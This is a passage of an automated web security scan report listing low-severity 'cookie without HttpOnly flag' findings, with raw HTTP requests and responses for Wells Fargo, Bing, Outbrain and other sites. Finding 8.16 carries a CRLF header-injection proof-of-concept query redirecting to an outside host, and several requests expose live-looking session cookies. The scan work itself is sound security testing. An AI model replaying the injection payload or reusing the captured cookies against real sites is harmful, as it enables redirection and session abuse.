Cookie: obuid=8212382c-a920-4555-8b81-259021933018; _lvs2="jIHpRjW4fRupx/ksspDebmqaTbfWC7yRNls1xBLluQgdIrCgnQmt8f0OG1e2lvOWewstTj20P33hLvNp2sFawtPR1Z6o06ly"; _lvd2="f/caN6PzBMk1F/lAXdWPeAONbvolwvwaGjSnoNU+2VO5SAU8hYi/29wx8t2EuHl8OSTmulhXsyCI4REknst1vwJvLAxo68T3J3ha2ARMD8w4gGNnxHK/u2EjsFbY+Vb7l0R/+1aTyjM="; _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1311040702757; Domain=outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="jIHpRjW4fRupx/ksspDebmqaTbfWC7yRNls1xBLluQgdIrCgnQmt8f0OG1e2lvOWewstTj20P33hLvNp2sFawtPR1Z6o06ly"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 01:58:22 GMT; Path=/
Set-Cookie: _lvd2="mPJshv1MhYq1peurTu/velXty3gxO0dAK4DoJEN0VUFQbO5UBgsqPVz1xfQCga1ux7y4+04dhUgLhsPAmU3vmR1v80Y9KizJsnotn6N6rbe6dmdB0YKlHmEjsFbY+Vb7SLmJfD9afX4="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Mon, 25-Jul-2011 14:46:22 GMT; Path=/
Set-Cookie: _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 01:58:22 GMT; Path=/
Set-Cookie: recs-e12d2d49134d4a5a55456c7e33d8990d="YGLIWLSCU9zh36cDmh3P3l85RKZEnC7kKxkoX5M8pN/WSlRYwycmulhMaFxig1+H"; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Tue, 19-Jul-2011 02:03:22 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 01:58:22 GMT
Content-Length: 2687

outbrain_rater.returnedOdbData({'response':{'exec_time':10,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'211901593','req_id':'36fb7aed35f919c0d97b40044959a4c2'},'score':{'preferred
...[SNIP]...

8.7. https://online.wellsfargo.com/das/signon

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /das/signon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /das/signon HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://online.wellsfargo.com/das/channel/enrollDisplay
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=LOB=CONS; BRAND_COOKIE=COB

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:50:06 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: banking/signon/SignonConsumer
Set-Cookie: OB_SO_ORIGIN=source=alternate; domain=.wellsfargo.com; path=/
Set-Cookie: BRAND_COOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

8.8. https://online.wellsfargo.com/signon

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /signon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signon?LOB=CONS HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/locator/atm/search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:46:47 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: banking/signon/SignonConsumer
Set-Cookie: OB_SO_ORIGIN= LOB=CONS; domain=.wellsfargo.com; path=/
Set-Cookie: BRAND_COOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

8.9. http://paid.outbrain.com/network/redir

Summary

Severity:   Information
Confidence:   Certain
Host:   http://paid.outbrain.com
Path:   /network/redir

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /network/redir?key=ea083f1f0a8664e17286dd018ebbd632&rdid=218341001&type=CAD_def_prd&in-site=false&pc_id=3389484&req_id=21fd5e9603ad3d38cc44a355febaf417&agent=blog_JS_rec&recMode=4&reqType=1&wid=1&imgType=0&version=40317&idx=6 HTTP/1.1
Host: paid.outbrain.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=8212382c-a920-4555-8b81-259021933018; _lvs2="jIHpRjW4fRupx/ksspDebmqaTbfWC7yRNls1xBLluQgdIrCgnQmt8f0OG1e2lvOWewstTj20P33hLvNp2sFawtPR1Z6o06ly"; _lvd2="f/caN6PzBMk1F/lAXdWPeAONbvolwvwaGjSnoNU+2VO5SAU8hYi/29wx8t2EuHl8OSTmulhXsyCI4REknst1vwJvLAxo68T3J3ha2ARMD8w4gGNnxHK/u2EjsFbY+Vb7l0R/+1aTyjM="; _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 01:58:19 GMT; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Content-Length: 436
Date: Tue, 19 Jul 2011 01:58:18 GMT

<html>
   <body onload="document.location.replace('http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825')">
       <form meth
...[SNIP]...

8.10. http://sensor2.suitesmart.com/sensor4.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sensor4.js?GID=15482;CRE=42330443;PLA=58217920;ADI=240048897; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: spass=639dc8c25a6771ff844957f2a2748213; G12546=C1S98727-3-0-0-0-1311017115-2; G15482=C1S103937-42-0-0-0-1311016999-308

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15482=C1S103937-44-0-0-0-1311016999-23706; path=/; domain=.suitesmart.com; expires=Sun, 15-Jan-2012 01:58:25 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Tue, 19 Jul 2011 01:58:25 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

8.11. http://server.iad.liveperson.net/hc/3194108/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/3194108/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/3194108/?&site=3194108&cmd=mTagInPage&lpCallId=726132489740-21619860781&protV=20&lpjson=1&page=http%3A//www.codero.com/&id=4111753688&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true&PV%21visitorActive=0 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5314624600296146657; LivePersonID=-16101514677756-1311040810:-1:-1:-1:-1; HumanClickSiteContainerID_3194108=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1311040808225

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:02:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_3194108=STANDALONE; path=/hc/3194108
Set-Cookie: LivePersonID=-16101514677756-1311040810:-1:-1:-1:-1; expires=Wed, 18-Jul-2012 02:02:49 GMT; path=/hc/3194108; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 19 Jul 2011 02:02:49 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 187

lpConnLib.Process({"ResultSet": {"lpCallId":"726132489740-21619860781","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-30", "js_code": "lpMTag.lpInPageRequestDelay=30;"}]}});

8.12. http://server.iad.liveperson.net/hc/3194108/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/3194108/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/3194108/?&site=3194108&cmd=mTagKnockPage&lpCallId=676269724499-240244198357&protV=20&lpjson=1&id=4111753688&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=5955467406805688328; path=/hc/3194108
Set-Cookie: HumanClickACTIVE=1311040809411; expires=Wed, 20-Jul-2011 02:00:09 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 19 Jul 2011 02:00:09 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1484

lpConnLib.Process({"ResultSet": {"lpCallId":"676269724499-240244198357","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.liveper
...[SNIP]...

8.13. http://statse.webtrendslive.com/dcsk7l4il00000wwytasjl7cu_1n7o/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcsk7l4il00000wwytasjl7cu_1n7o/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsk7l4il00000wwytasjl7cu_1n7o/dcs.gif?&dcsdat=1311040801591&dcssip=www.codero.com&dcsuri=/&WT.co_f=173.193.214.243-1234505376.30151644&WT.vtid=173.193.214.243-1234505376.30151644&WT.vtvs=1311040801593&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=21&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Dedicated%20Hosting%20with%20Backup%20%26%20Managed%20Services%20from%20Codero&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1065x723&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.codero.com/&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=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

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Jul 2011 01:59:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=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; path=/; expires=Fri, 16-Jul-2021 01:59:54 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

8.14. https://wellsoffice.wellsfargo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wellsoffice.wellsfargo.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: wellsoffice.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 19 Jul 2011 09:42:24 GMT
Content-length: 0
Content-type: text/html
Cache-Control: no-cache
Location: https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp?TYPE=33554433&REALMOID=06-3a718f7c-1c9d-0019-0000-6b5800006b58&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=nQv7GGyWUMf3GogDceQgLNkheYYCBKvmyZclEoI8LpvnPyAtYAwhziS4s5RAFbbT&TARGET=$SM$https%3a%2f%2fwellsoffice%2ewellsfargo%2ecom%2f
Set-Cookie: TLTSID=687AB7CCB1EB10B1991CF87992750532; Path=/; Domain=.wellsfargo.com; Secure
Set-Cookie: TLTSID=687AC5BEB1EB10B1991DF87992750532; Path=/; Domain=.wellsfargo.com; Secure
Set-Cookie: TLTSID=687AC65EB1EB10B1991EF87992750532; Path=/; Domain=.wellsfargo.com; Secure


8.15. http://www.bing.com/community/css-classnameexpansion.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /community/css-classnameexpansion.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /community/css-classnameexpansion.ashx?css=%2fcommunity%2fthemes%2fgeneric%2fcss%2flayout.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/css; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Telligent-Evolution: 5.5.134.12674
X-AspNet-Version: 2.0.50727
XSHOST: WS1
Vary: Accept-Encoding
Content-Length: 15825
Date: Tue, 19 Jul 2011 12:10:45 GMT
Connection: close
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+19+Jul+2011+12%3a10%3a45+GMT; expires=Wed, 18-Jul-2012 12:10:45 GMT; path=/community
Set-Cookie: CommunityServer-LastVisitUpdated-1001=; path=/community
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+19+Jul+2011+12%3a10%3a45+GMT; expires=Wed, 18-Jul-2012 12:10:45 GMT; path=/community
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:10:44 GMT; domain=.bing.com; path=/

.page-management-header { }.page-management { text-align: left; font-family: Arial, Helvetica !important; font-size: 12px !important; position: relative; border-top: solid 2px #aaa; background-color:
...[SNIP]...

8.16. http://www.bing.com/events/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /events/search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/search?q=http://xss.cx/%3f%0D%0ALocation:%20http://xss.cx/default.aspx?cwe-113-poc-via-bing.com HTTP/1.1
Host: www.bing.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SRCHUID=V=2&GUID=E8D2DDB02E5B451C9F1EB509739AB1CC; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110601; SRCHD=SM=1&MS=1842502&D=1841741&AF=MSN005; MUID=3957719BE8F34A5DA51D204E7E06704A; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; _FP=; _RwBf=credit=-1&s=0; _UR=OMW=1

Response

HTTP/1.1 200 OK
Content-Length: 0
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:05:34 GMT
Connection: close
Set-Cookie: _SS=SID=6972CFBED6CD45B1A2140850C807FA64; domain=.bing.com; path=/


8.17. http://www.bing.com/fd/AnswerBarHandler

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/AnswerBarHandler

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/AnswerBarHandler?q=Jonah%20Hill&vertical=VirtualEarth&subvertical=maps HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bing.com
Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865531&D=1865529&AF=MPSRCH; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; _FS=mkt=en-US
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 881
Date: Tue, 19 Jul 2011 12:11:11 GMT
Connection: keep-alive
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865531&D=1865529&AF=MPSRCH; expires=Thu, 18-Jul-2013 12:11:11 GMT; domain=.bing.com; path=/

<ul class="sw_a" id="sw_abarl"><li><a href="/search?q=Jonah+Hill" onmousedown="return si_T('&amp;ID=FD,4.1')">Web</a></li><li><a href="/news/search?q=Jonah+Hill&amp;qpvt=Jonah+Hill" onmousedown="retur
...[SNIP]...

8.18. http://www.bing.com/fd/InlineFeedbackHandler.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/InlineFeedbackHandler.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/InlineFeedbackHandler.aspx?IG=29ae479b70674c24adf680937cb5e176&CID=14230B4BB5064F8B9C1A3D1C2C91E937&IID=FD.1&WFID=wf11 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bing.com
Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=D=1865529&MS=1865529&AF=MPSRCH; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:34 GMT
Content-Length: 2459
Connection: keep-alive
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/

<div class="fbd" id="wf11"><div class="fbcontainer" id="wf11wdg1" style="display: none;"><form action="#" name="fb_formwf11wdg1"><table cellpadding="0" cellspacing="0" class="fbt" width="100%"><tbody>
...[SNIP]...

8.19. http://www.bing.com/fd/ls/GLinkPing.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/GLinkPing.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/GLinkPing.aspx?IG=33ba7e8b57514147a88c942f70994212&CID=14230B4BB5064F8B9C1A3D1C2C91E937&PM=Y&ID=FD,22.1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
